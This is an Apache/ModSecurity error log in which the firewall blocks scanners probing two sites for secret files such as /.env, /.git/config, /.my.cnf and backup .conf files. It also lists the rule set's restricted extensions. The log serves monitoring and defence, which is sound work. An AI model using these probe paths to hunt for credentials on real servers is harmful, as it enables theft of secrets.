[Wed Jan 29 01:43:23.607762 2025] [:error] [pid 778949] [client 185.246.189.156:49860] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.my.cnf"] [unique_id "Z5l5q8iZdor_OysQUzXbUwAAAAA"]
[Wed Jan 29 01:43:23.608046 2025] [:error] [pid 778949] [client 185.246.189.156:49860] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.my.cnf"] [unique_id "Z5l5q8iZdor_OysQUzXbUwAAAAA"]
[Wed Jan 29 01:43:24.920704 2025] [:error] [pid 781617] [client 185.246.189.156:49872] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/config.cfg"] [unique_id "Z5l5rDw07IGIWnwPlP02oQAAAAY"]
[Wed Jan 29 01:43:24.921697 2025] [:error] [pid 781617] [client 185.246.189.156:49872] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config.cfg"] [unique_id "Z5l5rDw07IGIWnwPlP02oQAAAAY"]
[Wed Jan 29 01:43:24.922148 2025] [:error] [pid 781617] [client 185.246.189.156:49872] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config.cfg"] [unique_id "Z5l5rDw07IGIWnwPlP02oQAAAAY"]
[Wed Jan 29 01:43:26.512427 2025] [:error] [pid 779023] [client 185.246.189.156:49886] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/config/config.cfg"] [unique_id "Z5l5rusTvB69BXjnMsGiFAAAAAM"]
[Wed Jan 29 01:43:26.513328 2025] [:error] [pid 779023] [client 185.246.189.156:49886] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/config.cfg"] [unique_id "Z5l5rusTvB69BXjnMsGiFAAAAAM"]
[Wed Jan 29 01:43:26.513739 2025] [:error] [pid 779023] [client 185.246.189.156:49886] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/config.cfg"] [unique_id "Z5l5rusTvB69BXjnMsGiFAAAAAM"]
[Wed Jan 29 01:43:28.056452 2025] [:error] [pid 778953] [client 185.246.189.156:49894] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.restore.conf"] [unique_id "Z5l5sKKGKRAgIiGrQO8wPgAAAAU"]
[Wed Jan 29 01:43:28.057545 2025] [:error] [pid 778953] [client 185.246.189.156:49894] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.restore.conf"] [unique_id "Z5l5sKKGKRAgIiGrQO8wPgAAAAU"]
[Wed Jan 29 01:43:28.058034 2025] [:error] [pid 778953] [client 185.246.189.156:49894] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.restore.conf"] [unique_id "Z5l5sKKGKRAgIiGrQO8wPgAAAAU"]
[Wed Jan 29 01:43:29.261550 2025] [:error] [pid 778952] [client 185.246.189.156:49910] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.m2media.conf"] [unique_id "Z5l5sdr_c6BIPFKcefKRxQAAAAQ"]
[Wed Jan 29 01:43:29.262638 2025] [:error] [pid 778952] [client 185.246.189.156:49910] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.m2media.conf"] [unique_id "Z5l5sdr_c6BIPFKcefKRxQAAAAQ"]
[Wed Jan 29 01:43:29.263101 2025] [:error] [pid 778952] [client 185.246.189.156:49910] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.m2media.conf"] [unique_id "Z5l5sdr_c6BIPFKcefKRxQAAAAQ"]
[Wed Jan 29 01:43:30.489716 2025] [:error] [pid 778950] [client 185.246.189.156:33580] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/m2-media-downloader/.m2media.conf"] [unique_id "Z5l5sqsGWWz8jbvsuU2a2QAAAAE"]
[Wed Jan 29 01:43:30.490716 2025] [:error] [pid 778950] [client 185.246.189.156:33580] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/m2-media-downloader/.m2media.conf"] [unique_id "Z5l5sqsGWWz8jbvsuU2a2QAAAAE"]
[Wed Jan 29 01:43:30.491154 2025] [:error] [pid 778950] [client 185.246.189.156:33580] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/m2-media-downloader/.m2media.conf"] [unique_id "Z5l5sqsGWWz8jbvsuU2a2QAAAAE"]
[Wed Jan 29 01:43:32.579147 2025] [:error] [pid 778951] [client 185.246.189.156:33584] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/magento2-media-downloader-bash-script/.m2media.conf"] [unique_id "Z5l5tI9_4nHO5WEzWUnzuwAAAAI"]
[Wed Jan 29 01:43:32.580104 2025] [:error] [pid 778951] [client 185.246.189.156:33584] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/magento2-media-downloader-bash-script/.m2media.conf"] [unique_id "Z5l5tI9_4nHO5WEzWUnzuwAAAAI"]
[Wed Jan 29 01:43:32.580586 2025] [:error] [pid 778951] [client 185.246.189.156:33584] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/magento2-media-downloader-bash-script/.m2media.conf"] [unique_id "Z5l5tI9_4nHO5WEzWUnzuwAAAAI"]
[Wed Jan 29 01:43:34.439411 2025] [:error] [pid 778949] [client 185.246.189.156:33600] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.m2-remote-to-local.conf"] [unique_id "Z5l5tsiZdor_OysQUzXbVAAAAAA"]
[Wed Jan 29 01:43:34.441412 2025] [:error] [pid 778949] [client 185.246.189.156:33600] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.m2-remote-to-local.conf"] [unique_id "Z5l5tsiZdor_OysQUzXbVAAAAAA"]
[Wed Jan 29 01:43:34.441863 2025] [:error] [pid 778949] [client 185.246.189.156:33600] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.m2-remote-to-local.conf"] [unique_id "Z5l5tsiZdor_OysQUzXbVAAAAAA"]
[Fri Jan 31 04:37:24.168103 2025] [:error] [pid 838654] [client 103.102.230.8:40338] [client 103.102.230.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z5xFdKiIs5BB2FvzsFDpSgAAAAI"]
[Fri Jan 31 04:37:24.171481 2025] [:error] [pid 838654] [client 103.102.230.8:40338] [client 103.102.230.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z5xFdKiIs5BB2FvzsFDpSgAAAAI"]
[Fri Jan 31 04:37:24.172014 2025] [:error] [pid 838654] [client 103.102.230.8:40338] [client 103.102.230.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z5xFdKiIs5BB2FvzsFDpSgAAAAI"]
[Fri Jan 31 20:41:12.006826 2025] [:error] [pid 849602] [client 158.220.108.107:45224] [client 158.220.108.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z50nWLo1O6D1FlRl5cSJFgAAAAw"]
[Fri Jan 31 20:41:12.009059 2025] [:error] [pid 849602] [client 158.220.108.107:45224] [client 158.220.108.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z50nWLo1O6D1FlRl5cSJFgAAAAw"]
[Fri Jan 31 20:41:12.009526 2025] [:error] [pid 849602] [client 158.220.108.107:45224] [client 158.220.108.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z50nWLo1O6D1FlRl5cSJFgAAAAw"]
[Mon Feb 03 02:20:21.110802 2025] [:error] [pid 900884] [client 45.148.10.86:56256] [client 45.148.10.86] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z6AZ1aZWPjD784eHVtG2pQAAAAA"]
[Mon Feb 03 02:20:21.112874 2025] [:error] [pid 900884] [client 45.148.10.86:56256] [client 45.148.10.86] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z6AZ1aZWPjD784eHVtG2pQAAAAA"]
[Mon Feb 03 02:20:21.113485 2025] [:error] [pid 900884] [client 45.148.10.86:56256] [client 45.148.10.86] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z6AZ1aZWPjD784eHVtG2pQAAAAA"]
[Mon Feb 03 03:55:09.697608 2025] [:error] [pid 903429] [client 34.219.159.38:48330] [client 34.219.159.38] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z6AwDT-b1MI6wxyjKb03qQAAAAY"]
[Mon Feb 03 03:55:09.698341 2025] [:error] [pid 903429] [client 34.219.159.38:48330] [client 34.219.159.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z6AwDT-b1MI6wxyjKb03qQAAAAY"]
[Mon Feb 03 03:55:09.698764 2025] [:error] [pid 903429] [client 34.219.159.38:48330] [client 34.219.159.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z6AwDT-b1MI6wxyjKb03qQAAAAY"]
[Mon Feb 03 14:00:57.749962 2025] [:error] [pid 903429] [client 95.111.244.79:48786] [client 95.111.244.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z6C-CT-b1MI6wxyjKb030AAAAAY"]
